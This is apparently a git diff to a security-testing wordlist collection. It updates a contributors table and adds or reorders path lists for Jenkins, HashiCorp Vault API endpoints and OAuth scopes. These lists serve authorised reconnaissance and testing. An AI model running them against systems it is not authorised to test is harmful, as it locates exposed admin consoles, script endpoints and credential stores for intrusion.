<img width='50' src='https://avatars.githubusercontent.com/u/15861008?v=4'/><br />[Martin407](https://api.github.com/users/Martin407) | <img width='50' src='https://avatars.githubusercontent.com/u/812795?v=4'/><br />[brimstone](https://api.github.com/users/brimstone) | <img width='50' src='https://avatars.githubusercontent.com/u/28390940?v=4'/><br />[0xalwayslucky](https://api.github.com/users/0xalwayslucky) | <img width='50' src='https://avatars.githubusercontent.com/u/8996052?v=4'/><br />[mazen160](https://api.github.com/users/mazen160) | <img width='50' src='https://avatars.githubusercontent.com/u/18094815?v=4'/><br />[melardev](https://api.github.com/users/melardev) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/1522389?v=4'/><br />[stuntguy3000](https://api.github.com/users/stuntguy3000) | <img width='50' src='https://avatars.githubusercontent.com/u/6770124?v=4'/><br />[Paradoxis](https://api.github.com/users/Paradoxis) | <img width='50' src='https://avatars.githubusercontent.com/u/13625919?v=4'/><br />[chokeee](https://api.github.com/users/chokeee) | <img width='50' src='https://avatars.githubusercontent.com/u/15861008?v=4'/><br />[Martin407](https://api.github.com/users/Martin407) | <img width='50' src='https://avatars.githubusercontent.com/u/812795?v=4'/><br />[brimstone](https://api.github.com/users/brimstone) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/5382437?v=4'/><br />[mbi000](https://api.github.com/users/mbi000) | <img width='50' src='https://avatars.githubusercontent.com/u/304361?v=4'/><br />[michenriksen](https://api.github.com/users/michenriksen) | <img width='50' src='https://avatars.githubusercontent.com/u/35827815?v=4'/><br />[mrajput7](https://api.github.com/users/mrajput7) | <img width='50' src='https://avatars.githubusercontent.com/u/4193175?v=4'/><br />[MusicGivesMeLife](https://api.github.com/users/MusicGivesMeLife) | <img width='50' src='https://avatars.githubusercontent.com/u/6197998?v=4'/><br />[Natfan](https://api.github.com/users/Natfan) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/28390940?v=4'/><br />[0xalwayslucky](https://api.github.com/users/0xalwayslucky) | <img width='50' src='https://avatars.githubusercontent.com/u/8996052?v=4'/><br />[mazen160](https://api.github.com/users/mazen160) | <img width='50' src='https://avatars.githubusercontent.com/u/18094815?v=4'/><br />[melardev](https://api.github.com/users/melardev) | <img width='50' src='https://avatars.githubusercontent.com/u/5382437?v=4'/><br />[mbi000](https://api.github.com/users/mbi000) | <img width='50' src='https://avatars.githubusercontent.com/u/304361?v=4'/><br />[michenriksen](https://api.github.com/users/michenriksen) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/11805218?v=4'/><br />[nkakouros](https://api.github.com/users/nkakouros) | <img width='50' src='https://avatars.githubusercontent.com/u/1519209?v=4'/><br />[ngkogkos](https://api.github.com/users/ngkogkos) | <img width='50' src='https://avatars.githubusercontent.com/u/4268373?v=4'/><br />[Faelian](https://api.github.com/users/Faelian) | <img width='50' src='https://avatars.githubusercontent.com/u/28601533?v=4'/><br />[parthmalhotra](https://api.github.com/users/parthmalhotra) | <img width='50' src='https://avatars.githubusercontent.com/u/679144?v=4'/><br />[Prinzhorn](https://api.github.com/users/Prinzhorn) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/35827815?v=4'/><br />[mrajput7](https://api.github.com/users/mrajput7) | <img width='50' src='https://avatars.githubusercontent.com/u/4193175?v=4'/><br />[MusicGivesMeLife](https://api.github.com/users/MusicGivesMeLife) | <img width='50' src='https://avatars.githubusercontent.com/u/6197998?v=4'/><br />[Natfan](https://api.github.com/users/Natfan) | <img width='50' src='https://avatars.githubusercontent.com/u/11805218?v=4'/><br />[nkakouros](https://api.github.com/users/nkakouros) | <img width='50' src='https://avatars.githubusercontent.com/u/1519209?v=4'/><br />[ngkogkos](https://api.github.com/users/ngkogkos) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/19480858?v=4'/><br />[ryan-wendel](https://api.github.com/users/ryan-wendel) | <img width='50' src='https://avatars.githubusercontent.com/u/3412841?v=4'/><br />[upgoingstar](https://api.github.com/users/upgoingstar) | <img width='50' src='https://avatars.githubusercontent.com/u/43149956?v=4'/><br />[SolomonSklash](https://api.github.com/users/SolomonSklash) | <img width='50' src='https://avatars.githubusercontent.com/u/26146246?v=4'/><br />[Splint3r7](https://api.github.com/users/Splint3r7) | <img width='50' src='https://avatars.githubusercontent.com/u/5340585?v=4'/><br />[shoeper](https://api.github.com/users/shoeper) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/4268373?v=4'/><br />[Faelian](https://api.github.com/users/Faelian) | <img width='50' src='https://avatars.githubusercontent.com/u/28601533?v=4'/><br />[parthmalhotra](https://api.github.com/users/parthmalhotra) | <img width='50' src='https://avatars.githubusercontent.com/u/679144?v=4'/><br />[Prinzhorn](https://api.github.com/users/Prinzhorn) | <img width='50' src='https://avatars.githubusercontent.com/u/29900840?v=4'/><br />[renanhsilva](https://api.github.com/users/renanhsilva) | <img width='50' src='https://avatars.githubusercontent.com/u/19480858?v=4'/><br />[ryan-wendel](https://api.github.com/users/ryan-wendel) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/18597330?v=4'/><br />[Anon-Exploiter](https://api.github.com/users/Anon-Exploiter) | <img width='50' src='https://avatars.githubusercontent.com/u/1835765?v=4'/><br />[Techbrunch](https://api.github.com/users/Techbrunch) | <img width='50' src='https://avatars.githubusercontent.com/u/10544393?v=4'/><br />[CanardMandarin](https://api.github.com/users/CanardMandarin) | <img width='50' src='https://avatars.githubusercontent.com/u/7030273?v=4'/><br />[seran](https://api.github.com/users/seran) | <img width='50' src='https://avatars.githubusercontent.com/u/3588994?v=4'/><br />[wasamasa](https://api.github.com/users/wasamasa) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/3412841?v=4'/><br />[upgoingstar](https://api.github.com/users/upgoingstar) | <img width='50' src='https://avatars.githubusercontent.com/u/48673505?v=4'/><br />[d4rkc0nd0r](https://api.github.com/users/d4rkc0nd0r) | <img width='50' src='https://avatars.githubusercontent.com/u/43149956?v=4'/><br />[SolomonSklash](https://api.github.com/users/SolomonSklash) | <img width='50' src='https://avatars.githubusercontent.com/u/26146246?v=4'/><br />[Splint3r7](https://api.github.com/users/Splint3r7) | <img width='50' src='https://avatars.githubusercontent.com/u/5340585?v=4'/><br />[shoeper](https://api.github.com/users/shoeper) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/1675215?v=4'/><br />[vinnytroia](https://api.github.com/users/vinnytroia) | <img width='50' src='https://avatars.githubusercontent.com/u/505214?v=4'/><br />[VitalySalnikov](https://api.github.com/users/VitalySalnikov) | <img width='50' src='https://avatars.githubusercontent.com/u/2567185?v=4'/><br />[mswell](https://api.github.com/users/mswell) | <img width='50' src='https://avatars.githubusercontent.com/u/3257054?v=4'/><br />[kongwenbin](https://api.github.com/users/kongwenbin) | <img width='50' src='https://avatars.githubusercontent.com/u/65070870?v=4'/><br />[whitehauler](https://api.github.com/users/whitehauler) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/18597330?v=4'/><br />[Anon-Exploiter](https://api.github.com/users/Anon-Exploiter) | <img width='50' src='https://avatars.githubusercontent.com/u/1835765?v=4'/><br />[Techbrunch](https://api.github.com/users/Techbrunch) | <img width='50' src='https://avatars.githubusercontent.com/u/55363474?v=4'/><br />[sAsPeCt488](https://api.github.com/users/sAsPeCt488) | <img width='50' src='https://avatars.githubusercontent.com/u/10544393?v=4'/><br />[CanardMandarin](https://api.github.com/users/CanardMandarin) | <img width='50' src='https://avatars.githubusercontent.com/u/7030273?v=4'/><br />[seran](https://api.github.com/users/seran) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/21525407?v=4'/><br />[Zawadidone](https://api.github.com/users/Zawadidone) | <img width='50' src='https://avatars.githubusercontent.com/u/56737596?v=4'/><br />[aayushsonu](https://api.github.com/users/aayushsonu) | <img width='50' src='https://avatars.githubusercontent.com/u/23340214?v=4'/><br />[ajazevedo](https://api.github.com/users/ajazevedo) | <img width='50' src='https://avatars.githubusercontent.com/u/8647820?v=4'/><br />[AlionGreen](https://api.github.com/users/AlionGreen) | <img width='50' src='https://avatars.githubusercontent.com/u/12997471?v=4'/><br />[api0cradle](https://api.github.com/users/api0cradle) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/3588994?v=4'/><br />[wasamasa](https://api.github.com/users/wasamasa) | <img width='50' src='https://avatars.githubusercontent.com/u/1675215?v=4'/><br />[vinnytroia](https://api.github.com/users/vinnytroia) | <img width='50' src='https://avatars.githubusercontent.com/u/505214?v=4'/><br />[VitalySalnikov](https://api.github.com/users/VitalySalnikov) | <img width='50' src='https://avatars.githubusercontent.com/u/2567185?v=4'/><br />[mswell](https://api.github.com/users/mswell) | <img width='50' src='https://avatars.githubusercontent.com/u/3257054?v=4'/><br />[kongwenbin](https://api.github.com/users/kongwenbin) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/64624025?v=4'/><br />[bugbounty69](https://api.github.com/users/bugbounty69) | <img width='50' src='https://avatars.githubusercontent.com/u/2116674?v=4'/><br />[cactuschibre](https://api.github.com/users/cactuschibre) | <img width='50' src='https://avatars.githubusercontent.com/u/36897432?v=4'/><br />[chudyPB](https://api.github.com/users/chudyPB) | <img width='50' src='https://avatars.githubusercontent.com/u/16451191?v=4'/><br />[davidegirardi](https://api.github.com/users/davidegirardi) | <img width='50' src='https://avatars.githubusercontent.com/u/26252635?v=4'/><br />[viksafe](https://api.github.com/users/viksafe) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/65070870?v=4'/><br />[whitehauler](https://api.github.com/users/whitehauler) | <img width='50' src='https://avatars.githubusercontent.com/u/21525407?v=4'/><br />[Zawadidone](https://api.github.com/users/Zawadidone) | <img width='50' src='https://avatars.githubusercontent.com/u/56737596?v=4'/><br />[aayushsonu](https://api.github.com/users/aayushsonu) | <img width='50' src='https://avatars.githubusercontent.com/u/23340214?v=4'/><br />[ajazevedo](https://api.github.com/users/ajazevedo) | <img width='50' src='https://avatars.githubusercontent.com/u/8647820?v=4'/><br />[AlionGreen](https://api.github.com/users/AlionGreen) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/50943770?v=4'/><br />[dotan3](https://api.github.com/users/dotan3) | <img width='50' src='https://avatars.githubusercontent.com/u/1926764?v=4'/><br />[espreto](https://api.github.com/users/espreto) | <img width='50' src='https://avatars.githubusercontent.com/u/1001883?v=4'/><br />[frite](https://api.github.com/users/frite) | <img width='50' src='https://avatars.githubusercontent.com/u/3603869?v=4'/><br />[guest20](https://api.github.com/users/guest20) | <img width='50' src='https://avatars.githubusercontent.com/u/8108116?v=4'/><br />[henry701](https://api.github.com/users/henry701) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/12997471?v=4'/><br />[api0cradle](https://api.github.com/users/api0cradle) | <img width='50' src='https://avatars.githubusercontent.com/u/64624025?v=4'/><br />[bugbounty69](https://api.github.com/users/bugbounty69) | <img width='50' src='https://avatars.githubusercontent.com/u/2116674?v=4'/><br />[cactuschibre](https://api.github.com/users/cactuschibre) | <img width='50' src='https://avatars.githubusercontent.com/u/36897432?v=4'/><br />[chudyPB](https://api.github.com/users/chudyPB) | <img width='50' src='https://avatars.githubusercontent.com/u/16451191?v=4'/><br />[davidegirardi](https://api.github.com/users/davidegirardi) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/4925223?v=4'/><br />[jaweesh](https://api.github.com/users/jaweesh) | <img width='50' src='https://avatars.githubusercontent.com/u/3896884?v=4'/><br />[jhsware](https://api.github.com/users/jhsware) | <img width='50' src='https://avatars.githubusercontent.com/u/37544323?v=4'/><br />[joegoerlich](https://api.github.com/users/joegoerlich) | <img width='50' src='https://avatars.githubusercontent.com/u/28585532?v=4'/><br />[Kegn](https://api.github.com/users/Kegn) | <img width='50' src='https://avatars.githubusercontent.com/u/856417?v=4'/><br />[lukebeer](https://api.github.com/users/lukebeer) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/26252635?v=4'/><br />[viksafe](https://api.github.com/users/viksafe) | <img width='50' src='https://avatars.githubusercontent.com/u/50943770?v=4'/><br />[dotan3](https://api.github.com/users/dotan3) | <img width='50' src='https://avatars.githubusercontent.com/u/1926764?v=4'/><br />[espreto](https://api.github.com/users/espreto) | <img width='50' src='https://avatars.githubusercontent.com/u/1001883?v=4'/><br />[frite](https://api.github.com/users/frite) | <img width='50' src='https://avatars.githubusercontent.com/u/3603869?v=4'/><br />[guest20](https://api.github.com/users/guest20) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/8407292?v=4'/><br />[0x6c7862](https://api.github.com/users/0x6c7862) | <img width='50' src='https://avatars.githubusercontent.com/u/25317633?v=4'/><br />[m4p0](https://api.github.com/users/m4p0) | <img width='50' src='https://avatars.githubusercontent.com/u/15820228?v=4'/><br />[mathieu-aubin](https://api.github.com/users/mathieu-aubin) | <img width='50' src='https://avatars.githubusercontent.com/u/595806?v=4'/><br />[maxence-schmitt](https://api.github.com/users/maxence-schmitt) | <img width='50' src='https://avatars.githubusercontent.com/u/9085465?v=4'/><br />[milangfx](https://api.github.com/users/milangfx) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/36943324?v=4'/><br />[han0x7300](https://api.github.com/users/han0x7300) | <img width='50' src='https://avatars.githubusercontent.com/u/8108116?v=4'/><br />[henry701](https://api.github.com/users/henry701) | <img width='50' src='https://avatars.githubusercontent.com/u/1073222?v=4'/><br />[hhc0null](https://api.github.com/users/hhc0null) | <img width='50' src='https://avatars.githubusercontent.com/u/43813075?v=4'/><br />[hitericcow](https://api.github.com/users/hitericcow) | <img width='50' src='https://avatars.githubusercontent.com/u/10952397?v=4'/><br />[ipentest](https://api.github.com/users/ipentest) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/64245063?v=4'/><br />[muhammedck113](https://api.github.com/users/muhammedck113) | <img width='50' src='https://avatars.githubusercontent.com/u/17338428?v=4'/><br />[mxrch](https://api.github.com/users/mxrch) | <img width='50' src='https://avatars.githubusercontent.com/u/22725031?v=4'/><br />[NeuronAddict](https://api.github.com/users/NeuronAddict) | <img width='50' src='https://avatars.githubusercontent.com/u/1171716?v=4'/><br />[objectified](https://api.github.com/users/objectified) | <img width='50' src='https://avatars.githubusercontent.com/u/5197413?v=4'/><br />[om3rcitak](https://api.github.com/users/om3rcitak) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/334504?v=4'/><br />[jakobhuss](https://api.github.com/users/jakobhuss) | <img width='50' src='https://avatars.githubusercontent.com/u/4925223?v=4'/><br />[jaweesh](https://api.github.com/users/jaweesh) | <img width='50' src='https://avatars.githubusercontent.com/u/3896884?v=4'/><br />[jhsware](https://api.github.com/users/jhsware) | <img width='50' src='https://avatars.githubusercontent.com/u/37544323?v=4'/><br />[joegoerlich](https://api.github.com/users/joegoerlich) | <img width='50' src='https://avatars.githubusercontent.com/u/28585532?v=4'/><br />[Kegn](https://api.github.com/users/Kegn) |
|
||||||
|
<img width='50' src='https://avatars.githubusercontent.com/u/856417?v=4'/><br />[lukebeer](https://api.github.com/users/lukebeer) | <img width='50' src='https://avatars.githubusercontent.com/u/8407292?v=4'/><br />[0x6c7862](https://api.github.com/users/0x6c7862) | <img width='50' src='https://avatars.githubusercontent.com/u/25317633?v=4'/><br />[m4p0](https://api.github.com/users/m4p0) | <img width='50' src='https://avatars.githubusercontent.com/u/15820228?v=4'/><br />[mathieu-aubin](https://api.github.com/users/mathieu-aubin) | <img width='50' src='https://avatars.githubusercontent.com/u/595806?v=4'/><br />[maxence-schmitt](https://api.github.com/users/maxence-schmitt) |
|
||||||
|
<img width='50' src='https://avatars.githubusercontent.com/u/9085465?v=4'/><br />[0xmilan](https://api.github.com/users/0xmilan) | <img width='50' src='https://avatars.githubusercontent.com/u/64245063?v=4'/><br />[muhammedck113](https://api.github.com/users/muhammedck113) | <img width='50' src='https://avatars.githubusercontent.com/u/22725031?v=4'/><br />[NeuronAddict](https://api.github.com/users/NeuronAddict) | <img width='50' src='https://avatars.githubusercontent.com/u/1171716?v=4'/><br />[objectified](https://api.github.com/users/objectified) | <img width='50' src='https://avatars.githubusercontent.com/u/5197413?v=4'/><br />[om3rcitak](https://api.github.com/users/om3rcitak) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/4111915?v=4'/><br />[oh6hay](https://api.github.com/users/oh6hay) | <img width='50' src='https://avatars.githubusercontent.com/u/54533285?v=4'/><br />[reydc](https://api.github.com/users/reydc) | <img width='50' src='https://avatars.githubusercontent.com/u/50427765?v=4'/><br />[rf-peixoto](https://api.github.com/users/rf-peixoto) | <img width='50' src='https://avatars.githubusercontent.com/u/1737715?v=4'/><br />[rik43](https://api.github.com/users/rik43) | <img width='50' src='https://avatars.githubusercontent.com/u/4674944?v=4'/><br />[sheimo](https://api.github.com/users/sheimo) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/4111915?v=4'/><br />[oh6hay](https://api.github.com/users/oh6hay) | <img width='50' src='https://avatars.githubusercontent.com/u/54533285?v=4'/><br />[reydc](https://api.github.com/users/reydc) | <img width='50' src='https://avatars.githubusercontent.com/u/50427765?v=4'/><br />[rf-peixoto](https://api.github.com/users/rf-peixoto) | <img width='50' src='https://avatars.githubusercontent.com/u/1737715?v=4'/><br />[rik43](https://api.github.com/users/rik43) | <img width='50' src='https://avatars.githubusercontent.com/u/4674944?v=4'/><br />[sheimo](https://api.github.com/users/sheimo) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/25377272?v=4'/><br />[slicin](https://api.github.com/users/slicin) | <img width='50' src='https://avatars.githubusercontent.com/u/638274?v=4'/><br />[socketz](https://api.github.com/users/socketz) | <img width='50' src='https://avatars.githubusercontent.com/u/52962854?v=4'/><br />[t0-git](https://api.github.com/users/t0-git) | <img width='50' src='https://avatars.githubusercontent.com/u/2032550?v=4'/><br />[tehmoon](https://api.github.com/users/tehmoon) | <img width='50' src='https://avatars.githubusercontent.com/u/37404408?v=4'/><br />[vulf](https://api.github.com/users/vulf) |
|
<img width='50' src='https://avatars.githubusercontent.com/u/25377272?v=4'/><br />[slicin](https://api.github.com/users/slicin) | <img width='50' src='https://avatars.githubusercontent.com/u/638274?v=4'/><br />[socketz](https://api.github.com/users/socketz) | <img width='50' src='https://avatars.githubusercontent.com/u/52962854?v=4'/><br />[t0-git](https://api.github.com/users/t0-git) | <img width='50' src='https://avatars.githubusercontent.com/u/2032550?v=4'/><br />[tehmoon](https://api.github.com/users/tehmoon) | <img width='50' src='https://avatars.githubusercontent.com/u/37404408?v=4'/><br />[vulf](https://api.github.com/users/vulf) |
|
||||||
<img width='50' src='https://avatars.githubusercontent.com/u/2480809?v=4'/><br />[0x90shell](https://api.github.com/users/0x90shell) | <img width='50' src='https://avatars.githubusercontent.com/u/35916197?v=4'/><br />[waawaa](https://api.github.com/users/waawaa) | <img width='50' src='https://avatars.githubusercontent.com/u/2480809?v=4'/><br />[0x90shell](https://api.github.com/users/0x90shell) | <img width='50' src='https://avatars.githubusercontent.com/u/35916197?v=4'/><br />[waawaa](https://api.github.com/users/waawaa) | <!-- /TABLE-AUTO-GENERATED -->
|
<img width='50' src='https://avatars.githubusercontent.com/u/2480809?v=4'/><br />[0x90shell](https://api.github.com/users/0x90shell) | <img width='50' src='https://avatars.githubusercontent.com/u/35916197?v=4'/><br />[waawaa](https://api.github.com/users/waawaa) |
|
||||||
|
|
||||||
|
<!-- /TABLE-AUTO-GENERATED -->
|
||||||
|
|||||||
@@ -1,11 +1,40 @@
|
|||||||
/view/All/builds
|
/about
|
||||||
/view/All/newjob
|
/administrativeMonitor/OldData/
|
||||||
|
/api/
|
||||||
/asynchPeople/
|
/asynchPeople/
|
||||||
/userContent/
|
/cli/
|
||||||
/computer/
|
/computer/
|
||||||
|
/configure
|
||||||
|
/configureCredentials
|
||||||
|
/configureSecurity
|
||||||
|
/configureTools
|
||||||
|
/credentials
|
||||||
|
/heapDump
|
||||||
|
/install
|
||||||
|
/load-statistics
|
||||||
|
/lockable-resources
|
||||||
|
/log
|
||||||
|
/logout
|
||||||
|
/manage
|
||||||
|
/me/my-views
|
||||||
|
/newView
|
||||||
|
/opensearch.xml
|
||||||
|
/pluginManager
|
||||||
|
/prepareShutdown
|
||||||
/pview/
|
/pview/
|
||||||
|
/rssAll
|
||||||
|
/rssFailed
|
||||||
|
/rssLatest
|
||||||
|
/script
|
||||||
|
/securityRealm/
|
||||||
|
/securityRealm/createAccount
|
||||||
|
/signup
|
||||||
/systeminf
|
/systeminf
|
||||||
/systemInfo
|
/systemInfo
|
||||||
/script
|
/threadDump
|
||||||
/signup
|
/toggleCollapse?paneId=buildQueue
|
||||||
/securityRealm/createAccount
|
/toggleCollapse?paneId=executors
|
||||||
|
/user/admin
|
||||||
|
/userContent/
|
||||||
|
/view/All/builds
|
||||||
|
/view/All/newjob
|
||||||
|
|||||||
@@ -6161,6 +6161,7 @@ disk
|
|||||||
diskuse
|
diskuse
|
||||||
diskussion
|
diskussion
|
||||||
diskuze
|
diskuze
|
||||||
|
dismiss
|
||||||
disney
|
disney
|
||||||
dispatch
|
dispatch
|
||||||
dispatcher
|
dispatcher
|
||||||
|
|||||||
67
Discovery/Web-Content/hashicorp-vault.txt
Normal file
67
Discovery/Web-Content/hashicorp-vault.txt
Normal file
@@ -0,0 +1,67 @@
|
|||||||
|
/v1/sys/audit
|
||||||
|
/v1/sys/audit-hash/
|
||||||
|
/v1/sys/auth
|
||||||
|
/v1/sys/capabilities
|
||||||
|
/v1/sys/capabilities-accessor
|
||||||
|
/v1/sys/capabilities-self
|
||||||
|
/v1/sys/config/auditing
|
||||||
|
/v1/sys/config/control-group
|
||||||
|
/v1/sys/config/cors
|
||||||
|
/v1/sys/config/reload
|
||||||
|
/v1/sys/config/state
|
||||||
|
/v1/sys/config/ui
|
||||||
|
/v1/sys/control-group
|
||||||
|
/v1/sys/generate-recovery-token
|
||||||
|
/v1/sys/generate-root
|
||||||
|
/v1/sys/health
|
||||||
|
/v1/sys/host-info
|
||||||
|
/v1/sys/init
|
||||||
|
/v1/sys/internal/counters
|
||||||
|
/v1/sys/internal/specs/openapi
|
||||||
|
/v1/sys/internal/ui/feature-flags
|
||||||
|
/v1/sys/internal/ui/mounts
|
||||||
|
/v1/sys/key-status
|
||||||
|
/v1/sys/leader
|
||||||
|
/v1/sys/leases
|
||||||
|
/v1/sys/license
|
||||||
|
/v1/sys/metrics
|
||||||
|
/v1/sys/mfa
|
||||||
|
/v1/sys/mfa/method/duo
|
||||||
|
/v1/sys/mfa/method/okta
|
||||||
|
/v1/sys/mfa/method/pingid
|
||||||
|
/v1/sys/mfa/method/totp
|
||||||
|
/v1/sys/monitor
|
||||||
|
/v1/sys/mounts
|
||||||
|
/v1/sys/namespaces
|
||||||
|
/v1/sys/plugins/reload/backend
|
||||||
|
/v1/sys/plugins/catalog
|
||||||
|
/v1/sys/policy
|
||||||
|
/v1/sys/policies
|
||||||
|
/v1/sys/policies/password
|
||||||
|
/v1/sys/pprof
|
||||||
|
/v1/sys/quotas/config
|
||||||
|
/v1/sys/quotas/rate-limit
|
||||||
|
/v1/sys/quotas/lease-count
|
||||||
|
/v1/sys/raw
|
||||||
|
/v1/sys/rekey
|
||||||
|
/v1/sys/rekey-recovery-key
|
||||||
|
/v1/sys/remount
|
||||||
|
/v1/sys/replication
|
||||||
|
/v1/sys/replication/performance
|
||||||
|
/v1/sys/replication/dr
|
||||||
|
/v1/sys/rotate
|
||||||
|
/v1/sys/rotate/config
|
||||||
|
/v1/sys/seal
|
||||||
|
/v1/sys/seal-status
|
||||||
|
/v1/sys/sealwrap/rewrap
|
||||||
|
/v1/sys/step-down
|
||||||
|
/v1/sys/storage
|
||||||
|
/v1/sys/storage/raft
|
||||||
|
/v1/sys/storage/raft/autopilot
|
||||||
|
/v1/sys/storage/raft/snapshot-auto
|
||||||
|
/v1/sys/tools
|
||||||
|
/v1/sys/unseal
|
||||||
|
/v1/sys/wrapping/lookup
|
||||||
|
/v1/sys/wrapping/rewrap
|
||||||
|
/v1/sys/wrapping/unwrap
|
||||||
|
/v1/sys/wrapping/wrap
|
||||||
@@ -38,3 +38,4 @@ logs/
|
|||||||
nginx.exe
|
nginx.exe
|
||||||
temp
|
temp
|
||||||
temp/
|
temp/
|
||||||
|
nginx.conf
|
||||||
|
|||||||
@@ -1,58 +1,77 @@
|
|||||||
|
|
||||||
1c
|
1c
|
||||||
Active2
|
|
||||||
AddressBookFields
|
|
||||||
AlcanceEmpleate
|
|
||||||
AllUserAttributes
|
|
||||||
Allgemeines_Template
|
|
||||||
ArgoCD
|
|
||||||
Atributi-forms
|
|
||||||
CARE-audience
|
|
||||||
CARE-service-audience
|
|
||||||
ClientConfig
|
|
||||||
CoffeeAndITRole
|
|
||||||
Gitlab
|
|
||||||
Groups
|
|
||||||
INBO_Java_Application
|
|
||||||
Jaeger-cicd-scope
|
|
||||||
Jenkins-azure
|
|
||||||
Jira
|
|
||||||
Jitsi
|
|
||||||
Linking_accounts
|
|
||||||
Mattermost
|
|
||||||
Nextcloud
|
|
||||||
Notificator
|
|
||||||
OpenID_PV_Basic_User_Info
|
|
||||||
PITMA
|
|
||||||
PSCUser
|
|
||||||
ROLE_ADMIN
|
|
||||||
ScopeLevel_JWTauthentication_REST_ExternalAuthServer
|
|
||||||
Security
|
|
||||||
Sonarqube
|
|
||||||
Strapi
|
|
||||||
UserManagement
|
|
||||||
Username
|
|
||||||
VNR
|
|
||||||
WPGroups
|
|
||||||
aal
|
aal
|
||||||
abc
|
abc
|
||||||
account-audience
|
account-audience
|
||||||
|
account_info.read
|
||||||
|
account_info.write
|
||||||
accounts-api
|
accounts-api
|
||||||
|
Active2
|
||||||
|
activity
|
||||||
ad
|
ad
|
||||||
address
|
address
|
||||||
address2
|
address2
|
||||||
address3
|
address3
|
||||||
address_
|
address_
|
||||||
|
AddressBookFields
|
||||||
admin
|
admin
|
||||||
admin-aud
|
admin-aud
|
||||||
admin-cli-audience
|
admin-cli-audience
|
||||||
admin-template
|
admin-template
|
||||||
|
admin.analytics:read
|
||||||
|
admin.apps:read
|
||||||
|
admin.apps:write
|
||||||
|
admin.barriers:read
|
||||||
|
admin.barriers:write
|
||||||
|
admin.directory.customer
|
||||||
|
admin.directory.customer.readonly
|
||||||
|
admin.directory.device.chromeos
|
||||||
|
admin.directory.device.chromeos.readonly
|
||||||
|
admin.directory.device.mobile
|
||||||
|
admin.directory.device.mobile.action
|
||||||
|
admin.directory.device.mobile.readonly
|
||||||
|
admin.directory.domain
|
||||||
|
admin.directory.domain.readonly
|
||||||
|
admin.directory.group
|
||||||
|
admin.directory.group.member
|
||||||
|
admin.directory.group.member.readonly
|
||||||
|
admin.directory.group.readonly
|
||||||
|
admin.directory.orgunit
|
||||||
|
admin.directory.orgunit.readonly
|
||||||
|
admin.directory.resource.calendar
|
||||||
|
admin.directory.resource.calendar.readonly
|
||||||
|
admin.directory.rolemanagement
|
||||||
|
admin.directory.rolemanagement.readonly
|
||||||
|
admin.directory.user
|
||||||
|
admin.directory.user.alias
|
||||||
|
admin.directory.user.alias.readonly
|
||||||
|
admin.directory.user.readonly
|
||||||
|
admin.directory.user.security
|
||||||
|
admin.directory.userschema
|
||||||
|
admin.directory.userschema.readonly
|
||||||
|
admin.invites:read
|
||||||
|
admin.invites:write
|
||||||
|
admin.teams:read
|
||||||
|
admin.teams:write
|
||||||
|
admin.usergroups:read
|
||||||
|
admin.usergroups:write
|
||||||
|
admin.users:read
|
||||||
|
admin.users:write
|
||||||
|
admin:gpg_key
|
||||||
|
admin:org
|
||||||
|
admin:org_hook
|
||||||
|
admin:public_key
|
||||||
|
admin:repo_hook
|
||||||
adminapi
|
adminapi
|
||||||
administrador
|
administrador
|
||||||
advancedssoadmin-admin
|
advancedssoadmin-admin
|
||||||
agroups
|
agroups
|
||||||
aks
|
aks
|
||||||
|
AlcanceEmpleate
|
||||||
algoras-app-scope
|
algoras-app-scope
|
||||||
all
|
all
|
||||||
|
Allgemeines_Template
|
||||||
|
AllUserAttributes
|
||||||
analytics
|
analytics
|
||||||
analytics/query/data
|
analytics/query/data
|
||||||
analytics/query/metadata
|
analytics/query/metadata
|
||||||
@@ -64,6 +83,8 @@ apicallers
|
|||||||
apm
|
apm
|
||||||
app_version
|
app_version
|
||||||
application
|
application
|
||||||
|
ArgoCD
|
||||||
|
Atributi-forms
|
||||||
attribute1
|
attribute1
|
||||||
attributes
|
attributes
|
||||||
attributes_Json
|
attributes_Json
|
||||||
@@ -71,37 +92,7 @@ aud
|
|||||||
aud-mapper-scope
|
aud-mapper-scope
|
||||||
audience
|
audience
|
||||||
auth-test-stagging-admin
|
auth-test-stagging-admin
|
||||||
auto-tmp1dlduuzf-admin
|
authorizations:read
|
||||||
auto-tmp1eaywbvt-admin
|
|
||||||
auto-tmp1eleoycw-admin
|
|
||||||
auto-tmp1eyrpmte-admin
|
|
||||||
auto-tmp1fwtubol-admin
|
|
||||||
auto-tmp1gvuthnr-admin
|
|
||||||
auto-tmp1hwrxaay-admin
|
|
||||||
auto-tmp1jlvrbjw-admin
|
|
||||||
auto-tmp1mdbjtvp-admin
|
|
||||||
auto-tmp1mecbtko-admin
|
|
||||||
auto-tmp1mifssjv-admin
|
|
||||||
auto-tmp1milmkwr-admin
|
|
||||||
auto-tmp1mzqfqgj-admin
|
|
||||||
auto-tmp1nrbcawi-admin
|
|
||||||
auto-tmp1nuyhigs-admin
|
|
||||||
auto-tmp1oyrevkh-admin
|
|
||||||
auto-tmp1qvriuim-admin
|
|
||||||
auto-tmp1rpvgrey-admin
|
|
||||||
auto-tmp1rrzhpea-admin
|
|
||||||
auto-tmp1srrjprn-admin
|
|
||||||
auto-tmp1venwzwf-admin
|
|
||||||
auto-tmp1wpuzvpj-admin
|
|
||||||
